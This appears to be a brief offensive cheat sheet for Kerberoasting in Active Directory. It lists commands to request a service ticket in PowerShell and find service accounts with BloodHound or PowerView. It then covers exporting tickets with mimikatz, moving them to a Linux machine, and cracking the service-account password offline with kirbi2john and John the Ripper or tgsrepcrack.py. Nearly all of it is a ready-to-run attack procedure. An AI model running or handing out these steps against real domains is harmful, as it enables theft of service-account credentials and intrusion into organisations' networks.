Type 1) & 2) in powershell or cmd , this will generate requested service ticket

  1. Add-Type -AssemblyName System.IdentityModel

  2. New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “<SPN>” to get SPN, go to bloodhound>select service account>node info>spn Or with PowerView  with the command Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname

  3. Run mimikatz.exe privilege::debug

  4. kerberos::list /export , download service ticket

  5. exit to exit mimikatz

  6. dir to check output and select the desire file and transfer it on your linux machine (if netcat used then transfer it in binary)

  7. kirbi2john <file> >hash.txt

  8. john hash.txt —wordlist=rockyou.txt

  1. Follow till step 5 to export service ticket , then ./tgsrepcrack.py <wordlist> <.kirbi file>